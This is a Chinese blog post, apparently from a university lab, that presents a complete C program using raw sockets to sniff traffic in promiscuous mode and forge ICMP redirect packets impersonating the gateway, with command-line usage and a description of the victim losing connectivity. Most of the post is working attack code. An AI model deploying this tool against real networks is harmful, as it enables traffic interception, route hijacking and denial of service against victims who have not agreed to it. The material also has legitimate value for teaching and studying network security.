Socket编程实现网络抓包分析和ICMP重定向

最新推荐文章于 2024-10-08 22:21:45 发布
最新推荐文章于 2024-10-08 22:21:45 发布
阅读量1.3k 收藏 12
点赞数 3
文章标签: socket icmp 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/najdhdfh/article/details/111923662
版权
这是一篇关于学校实验的文章,通过Socket编程实现了网络抓包和ICMP重定向。实验中,将网卡设置为混杂模式,攻击者虚拟机能够嗅探到受害者虚拟机的数据包。通过特定参数,攻击者伪装成网关向受害者发送重定向数据包,导致受害者无法ping通特定地址,这种状态可持续5分钟,受限于路由表缓存的有效时间。
摘要由CSDN通过智能技术生成

学校的一次实验,敲的挺辛苦的,就不多说了,看注释吧。
记得把网卡打开为混杂模式:sudo ifconfig [device_name] promisc
这样攻击者(192.168.1.128)虚拟机就能嗅探到另一台受害者(192.168.1.129)虚拟机的数据包了
参数格式: -g [重定向ip地址] -i [原来的网关地址]
攻击效果如下:
首先是攻击者视角,抓到的一些包(受害者在ping百度):
在这里插入图片描述
接下来是受害者视角:攻击者伪装成网关(192.168.1.2)给受害者发送重定向数据包,之后可以查看受害者主机的路由表缓存。在攻击者没有开启转发功能的话,受害者ping不通百度。此状态最多持续5分钟,因为这是路由表缓存的有效时间。
在这里插入图片描述

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<netinet/ip_icmp.h>
#include<netinet/tcp.h>
#include<netinet/udp.h>
#include<arpa/inet.h>
#include<sys/socket.h>
#include<sys/types.h>
#include<netinet/ether.h>

#define BUFFSIZE            2048    //数据缓冲区大小
#define FRAME_HEADER_SIZE   14      //帧头部大小
#define MAC_ADDRESS_SIZE    6       //MAC帧地址大小
#define IP_HEADER_SIZE      20      //IP头部大小

// 对接收的报文数量进行编号
static int count =0;

// 基于IP层的常见协议类型枚举
enum PROTOCOL{
    ICMP = 1,
    IGMP = 2,
    IP = 4,
    TCP = 6,
    UDP = 17
};

// 以太网协议类型枚举
enum Ether_Type{
    IPv4 = 0x0800,
    ARP = 0x0806,
    RARP = 0x8035,
    IPv6 = 0x86dd
};

// 常用ICMP类型
enum ICMP_Type{
    Echo_Reply = 0,
    Destination_Unreachable = 3,
    Redirect = 5,
    Echo_Request = 8,
};

// ICMP重定向报文头部定义
struct icmp_header{
    /* data */
    uint8_t icmp_type;
    uint8_t icmp_code;
    uint16_t icmp_checksum;
};

// ICMP重定向报文IP数据报
// 数据报内容:
// 1)IP头部:                         (20 bytes)
// 2)ICMP头部:                       (4 bytes)
// 3)新网关IP:                       (4 bytes)
// 4)被重定向IP报文首部及payload前8字节:(28 bytes)
struct icmp_redirect_datagram{
        struct ip ip_header;
        struct icmp_header icmp_header;
        struct in_addr gateway_addr;
        unsigned char ip_datagram[28];
};

// @description         将icmp类型转换为字符串
// @param   icmp_type   ICMP头部字段icmp_type值
// @param   buf         字符数组指针,指向ICMP类型字符串
void to_icmp_type(uint8_t icmp_type, char (*buf)[10]){
    switch(icmp_type){
        case Echo_Reply: strcpy(*buf,"Echo Reply");break;
        case Destination_Unreachable: strcpy(*buf,"Unreachable");break;
        case Redirect: strcpy(*buf,"Redirect");break;
        case Echo_Request: strcpy(*buf,"Echo Request");break;
        default: strcpy(*buf,"unknown");
    }
}

// @description         将protocol类型转换为协议类型字符串
// @param  ip_protocol  IP头部protocol字段值 
// @param  buf          字符数组指针,存储协议类型字符串
void to_protocol(uint8_t ip_protocol,char (*buf)[10]){
    switch(ip_protocol){
        case ICMP: strcpy(*buf,"ICMP");break;
        case IGMP: strcpy(*buf,"IGMP");break;
        case IP:   strcpy(*buf,"IP");break;
        case TCP:  strcpy(*buf,"TCP");break;
        case UDP:  strcpy(*buf,"UDP");break;
        default:   strcpy(*buf,"unknown");
    }
}

// @description: 将原始数据转换为协议类型字符串
// @param   buf: 指针,指向帧头部表示EhterType字段的两个字节
// @param   type: 数组指针,指向保存协议类型字符串的数组
void to_ether_type(const unsigned short *buf, char (*type)[10]){
    unsigned short value = buf[0];
    switch(value){
        case IPv4:strcpy(*type,"IPv4");break;
        case ARP:strcpy(*type,"ARP");break;
        case RARP:strcpy(*type,"RARP");break;
        case IPv6:strcpy(*type,"IPv6");break;
        default:strcpy(*type,"unknown");
    }
}

// @description: 打印帧头部信息
// @param buf: 指针,指向接收数据的缓冲区
void print_frame_header(const unsigned char *recv_buf){
    char ether_type[10];
    printf("TO MAC: ");
    for(int i=0; i<MAC_ADDRESS_SIZE-1; ++i){
        printf("%02x",recv_buf[i]);
        printf(":");
    }
    printf("%02x",recv_buf[MAC_ADDRESS_SIZE-1]);

    printf("   FROM MAC: ");
    for(int i=MAC_ADDRESS_SIZE; i<MAC_ADDRESS_SIZE+5; ++i){
        printf("%02x",recv_buf[i]);
        printf(":");
    }
    printf("%02x",recv_buf[MAC_ADDRESS_SIZE+5]);
    to_ether_type(recv_buf+MAC_ADDRESS_SIZE*2,&ether_type);
    printf("   Ehter Type: %s\n",ether_type);
}

// @description: 打印ICMP报文类型
// @param recv_buf: 指针,指向接收数据的缓冲区
void print_icmp_type(const unsigned char *recv_buf){
    char icmp_type[10];
    struct icmp_header *icmp_header = (struct icmp_header *)(recv_buf + FRAME_HEADER_SIZE + IP_HEADER_SIZE);
    to_icmp_type(icmp_header->icmp_type,&icmp_type);
    printf("(%s)",icmp_type);
}

// @description: 打印IP报文头部信息
// @param recv_buf: 指针,指向接受数据的缓冲区
void print_ip_header(const unsigned char *recv_buf){
    char protocol[10];

    struct ip *ip_header = (struct ip *)(recv_buf + FRAME_HEADER_SIZE);
    to_protocol(ip_header->ip_p,&protocol);

    printf("    FROM IP: %s",inet_ntoa(ip_header->ip_src));
    printf("    TO IP: %s",inet_ntoa(ip_header->ip_dst));
    printf("    Protocl: %s",protocol);
    
    if(ip_header->ip_p == ICMP){
        print_icmp_type(recv_buf);
    }
    printf("\n");
}

// @description         格式化打印帧内容
// @param   buf         指针,指向接收数据的缓冲区
// @param   datasize    原始帧数据大小
void print_datagram(const unsigned char *buf, unsigned int data_size){
    int i=0,j=0;
    for(i=0;i<data_size;i++){                           //将数据转换为字符串打印
        if(i!=0 && i%16==0){
            printf("	");
            for(j=i-16;j<i;j++){
                if(buf[j]>=32&&buf[j]<=128)
                    printf("%c",buf[j]);
                else 
                    printf(".");   
            }
            printf("\n");
        }
        if(i%16 == 0) printf("%04x	",i);       //打印数据偏移量			
        printf("%02x ",buf[i]);                 //将数据以16进制打印
        
        if(i==data_size-1){                             //对齐打印
            for(j=0;j<15-i%16;j++)
                printf("   ");
            printf("	");
            for(j=i-i%16;j<=i;j++){
                if(buf[j]>=32&&buf[j]<127)
                    printf("%c",buf[j]);
                else 
                    printf(".");

            }
        }
    }
    printf("\n");
}

// @description:    计算校验和
// @param   data    数据起始地址
// @param   len     数据长度
// @return  unsigned short类型校验和
unsigned short get_checksum(const void * data, char len){
    unsigned int checksum = 0;
    const unsigned short *p = data;
    while(len > 1){
        checksum += *p++;
        len -=2;
    }
    if(len)
        checksum += *(const unsigned char *)p;
    while(checksum >> 16){
        checksum = (checksum >> 16) + (checksum & 0xffff);
        checksum += (checksum >> 16);
    }
    return (unsigned short)~checksum;
}

// @description: 网络嗅探,并将原始数据保存至buf[]
// @param   recv_socket_fd  接收数据的socket句柄
// @param   buf             数组指针,指向接收数据的缓冲区
void sniffer(int recv_socket_fd,unsigned char (*buf)[BUFFSIZE]){
    if(recv_socket_fd < 0){
        printf("recv_socket error!\n");
        exit(1);
    }

    int data_size = -1;

    while(data_size < 0){
        data_size = recvfrom(recv_socket_fd,*buf,BUFFSIZE,0,NULL,NULL);
        if(data_size < 0){
            printf("receive error!\n");
            exit(1);
        }
        count ++;
        printf("----------------------------\n");
        printf("%d   ",count);
        print_frame_header(*buf);
        print_ip_header(*buf);
        printf("\n");
        print_datagram(*buf,data_size);

        printf("---------------------------\n");
        printf("\n\n");
    }
}

// @description:构造并发送icmp重定向报文
// @param   send_socket_fd: 发送数据报文的socket句柄
// @param   recv_buf:       原始报文数据
// @param   gateway_addr:   原网关地址
// @param   new_gateway_addr:   新网关地址(重定向地址)
void send_redirect_icmp(int send_socket_fd, const unsigned char *recv_buf, struct in_addr gateway_addr,
                        struct in_addr new_gateway_addr){
    if(send_socket_fd < 0){
        printf("send_socket error!\n");
        exit(1);
    }

    int one = 1,res;
    const int *ptr_one = (const int *)&one;
    
    //设置HDRINCL, 表示自己来构造IP头部,不需要系统参与
    res = setsockopt(send_socket_fd, IPPROTO_IP, IP_HDRINCL,ptr_one, sizeof(one));
    if(res < 0)
    {
        printf("set socketopt error--\n");
        exit(1);
    }

    //定义要发送的数据报文
    struct icmp_redirect_datagram datagram;
    struct in_addr target_addr;

    memcpy(&target_addr,(struct in_addr *)(recv_buf + FRAME_HEADER_SIZE + 12),4);
    
    struct sockaddr_in target;
    target.sin_addr = target_addr;
    target.sin_family = AF_INET;

    //填充IP头部
    datagram.ip_header.ip_v     = 4;
    datagram.ip_header.ip_hl    = 5;
    datagram.ip_header.ip_tos   = 0;
    datagram.ip_header.ip_len   = htons(56);
    datagram.ip_header.ip_off   = 0;
    datagram.ip_header.ip_id    = random() & 0x3333;    //随机值
    datagram.ip_header.ip_ttl   = 0x40;
    datagram.ip_header.ip_p     = ICMP;
    datagram.ip_header.ip_sum   = 0;
    datagram.ip_header.ip_src   = gateway_addr;
    datagram.ip_header.ip_dst   = target_addr;
    
    // 计算IP头部校验和
    datagram.ip_header.ip_sum = get_checksum(&datagram,IP_HEADER_SIZE);

    //填充ICMP头部
    datagram.icmp_header.icmp_type = ICMP_REDIRECT;
    datagram.icmp_header.icmp_code = ICMP_REDIRECT_HOST;
    datagram.icmp_header.icmp_checksum = 0;

    //填充ICMP.gateway
    datagram.gateway_addr = new_gateway_addr;

    //填充ICMP报文
    memcpy(datagram.ip_datagram, recv_buf + FRAME_HEADER_SIZE, IP_HEADER_SIZE + 8);
    
    //计算校验和
    datagram.icmp_header.icmp_checksum = get_checksum(&(datagram.icmp_header),36);

    //发送报文
    int send_size = sendto(send_socket_fd,&datagram,56,0,(const struct sockaddr *)&target,sizeof(target));
    if(send_size < 0){
        printf("send error\n");
        exit(1);
    }

    //调试信息,打印发送的报文数据
    #ifdef DEBUG
    printf("sent redirect(%d bytes): \n",send_size);
    for(int i=0; i<sizeof(datagram); ++i){
        printf("%02x ",((unsigned char*)&datagram)[i]);
        if(i%16 == 0 && i != 0)
            printf("\n");
    }
    #endif
}

// @description: 打印命令提示
void print_cmdprompt(void){
    printf("    -g [new gateway ip]        example:{192.168.1.128}\n");
    printf("    -i [original gateway ip]   example:{192.168.1.2}\n");
}

// @description: 加载参数
// @param   addr:       原网关地址
// @param   new_addr:   新网关地址(重定向地址)
void load_argv(int argc, char *argv[], struct in_addr *addr, struct in_addr *new_addr){
    unsigned char flag_i = 0,flag_g = 0;
    for(unsigned char i=1; i<argc-1; ++i){
        if(!strcmp(argv[i],"-i")){
            if(inet_aton(argv[i+1],addr)==0){
                printf("bad -i argument!\n");
                print_cmdprompt();
                exit(1);
            }else{
                flag_i = 1;
            }
        }else if(!strcmp(argv[i],"-g")){
            if(inet_aton(argv[i+1],new_addr)==0){
                printf("bad -g argument!\n");
                print_cmdprompt();
                exit(1);
            }else{
                flag_g = 1;
            }
        }
    }
    if(!(flag_i & flag_g)){
        printf("bad arguments!\n");
        print_cmdprompt();
        exit(1);
    }
}

int main(int argc, char *argv[]){
    int recv_socket_fd;             //接收数据的socket句柄
    int send_socket_fd;             //发送数据的socket句柄
    unsigned char recv_buf[BUFFSIZE];        //接收数据缓冲区
    struct in_addr gateway_addr;            //原网关地址    接收参数
    struct in_addr new_gateway_addr;        //重定向地址(新网关地址)  接收参数

    //加载参数
    load_argv(argc,argv,&gateway_addr,&new_gateway_addr);
    
    //生成socket
    recv_socket_fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_IP));
    send_socket_fd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);

    while(1){
        //网络嗅探
        sniffer(recv_socket_fd,&recv_buf);
        //发送ICMP重定向报文
        send_redirect_icmp(send_socket_fd,recv_buf,gateway_addr,new_gateway_addr);
    }

    //关闭socket
    // close(recv_socket_fd);
    // close(send_socket_fd);
    return 0;
}
李四先生
关注
网络进阶】网络问题排查实例集锦(实战经验分享)
dvlinker的技术专栏
05-08 3万+
本文详细讲述了实际项目中遇到的多个网络问题的排查过程,以供参考!
c语言基于Socket使用ICMP协议发现网络中的活动主机
走向CTO的路上...
11-27 1093
如果收到响应,则表示目标主机处于活动状态。发送方发送一个ICMP Echo Request报文到目标主机,目标主机接收到后会回复一个ICMP Echo Reply报文。通过测量往返时间和判断是否收到回复,可以判断网络的延迟和目标主机是否可达。ICMP是在网络层(OSI模型的第三层)上工作的一种协议,主要用于网络中的错误报告、网络故障诊断和网络拓扑发现。通过发送ICMP Echo Request报文到网络中的所有可能IP地址,可以发现网络中哪些主机处于活动状态。可以用于发现网络中活动的主机,尤其在局域网中。
icmp socket
SendRecvDream的专栏
01-05 1990
<br />/*<br />author: duanjigang <duanjigang1983@126.com,duanjigang1983@gmail.com><br />des: a faked ping message to get  loading user names and<br />password of the FTP service from a remote machine,<br />the user names and password are sniffered by our<b
Socket通信和数据抓包分析-python
最新发布
hzy9588的博客
10-08 475
【代码】Socket通信和数据抓包分析-python。
socket 网络编程并抓本地回环包
weixin_53665577的博客
02-04 1038
1.理解进程通信的原理及通信过程; 2.掌握基本的网络编程方法; 3.需要有流程图; 4.需要抓取传输内容。
Python socket 编写一个Ping 程序 利用网际层icmp协议 计算机网络
一棵藤井树丶
12-27 2046
计算机网络课程设计,要编写一个Ping 程序 或者 tracert 程序 。 不使用C/C++ ,Java 不提供传输层一下的控制。只好使用Python来编写 讲解参考https://www.cnblogs.com/JetpropelledSnake/p/9177770.html 参考https://wordpress.youran.me/python-raw-socket-progra...
icmp socket 之二
SendRecvDream的专栏
01-05 2310
<br />#include <stdio.h><br />#include <errno.h><br />#include <unistd.h><br />#include <sys/socket.h><br />#include <sys/types.h><br />#include <netinet/tcp.h><br />#include <netinet/ip.h><br />#include <net/ethernet.h><br />#include <netinet/ip_icmp.h><b
实验一:ICMP重定向攻击
chuxuezheerer的博客
10-09 5719
实验原理: ICMP重定向信息是路由器向主机提供实时的路由信息,当一个主机收到ICMP重定向信息时,它就会根据这个信息来更新自己的路由表。由于缺乏必要的合法性检查,如果一个黑客想要被攻击的主机修改它的路由表,黑客就会发送ICMP重定向信息给被攻击的主机,让该主机按照黑客的要求来修改路由表。 在VMware虚拟环境中(Virtual Box不同),.2是充当网关的默认地址(通过route命令可以查看当前的网关和路由信息);所以攻击者可以冒充.2发出重定向包,通知受害者修改自己的网关为攻击者指定的gw地址;如果
ICMP重定向攻击
城志的学习笔记
02-05 1255
文章目录icmp基础smurf攻击icmp重定向攻击基于libpcap的sniffer数据包解析定义包头raw socket解析数据包重定向 icmp基础 https://zhuanlan.zhihu.com/p/58662573 头部type,code,checksum ,4字节,扩展字段,4字节 icmp作为数据部分封装到ip数据报中 IPv4中的常用type,ipv6与之不同 0:Echo...
【学习点滴】linux调试工具、cmake和网络抓包
o小菜的博客
03-23 3702
目录 gdb 多进程调试 多线程调试: gdb底层原理 Linux下查看服务器端的并发连接个数: Valgrind memcheck strace Linux下,绑定1024以下的端口需要root权限! webbench压测工具 wireshark 网络抓包记录 tcpdump traceroute iftop perf linux下各种日志 makefile...
【Go语言网络编程终极指南】:精通net包,从入门到实战的12个必学技巧
[【Go语言网络编程终极指南】:精通net包,从入门到实战的12个必学技巧](https://resources.jetbrains.com/help/img/idea/2021.1/go_integration_with_go_templates.png) # 1. Go语言网络编程概述 在当今这个数字化...
利用RawSocket实现简单的Ping程序 ICMP协议
12-13
利用RawSocket实现简单的Ping程序 ICMP协议 编程语言 C++ 操作系统 Linux(Ubuntu 10.0) 开发环境(可选)Qt4.7.0
python socket ICMP 进行通信
mainjay的博客
11-01 1546
由此可见,当发送的数据包足够大时,平均丢包率为70%
使用Raw Socket实现ICMP重定向
weixin_42785235的博客
03-24 716
#include<stdio.h> #include<stdlib.h> #include<string.h> #include<netinet/ip_icmp.h> #include<netinet/tcp.h> #include<netinet/udp.h> #include<arpa/inet.h> #include<sys/socket.h> #include<sys/types.h> #i.
RAW SOCKET实现ICMP重定向攻击
Zzxy
04-06 4109
实验记录
chatgpt赋能python:PythonSocketICMP:介绍和其应用
test100t的博客
05-25 169
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
ICMP套接字编程
最后一个bug的博客
04-03 480
ICMP报文有很多种类型,包括回显请求(Echo Request)、回显应答(Echo Reply)、目的不可达(Destination Unreachable)、超时(Time Exceeded)等。可以使用ICMP头文件<netinet/ip_icmp.h>来解析ICMP报文。总之,ICMP编程是网络编程的一个重要部分,它可以帮助我们诊断网络问题、测试网络连接、进行路由跟踪等。要使用ICMP协议,需要创建ICMP套接字、发送ICMP报文、接收ICMP回复报文,并解析ICMP报文类型和数据。
基于raw socket结合icmp报文获取本机外网ip
12-10 1176
思:获取本地主机外网IP的方法有很多,更简单的办法也很多,这里只是提供一个可行的办法,顺便结合raw socket + icmp报文做个练习。程序已经在centos6.3上测试编译运行通过!   #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include &lt;stdio.h&gt; #include &lt;stdlib.h&g...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值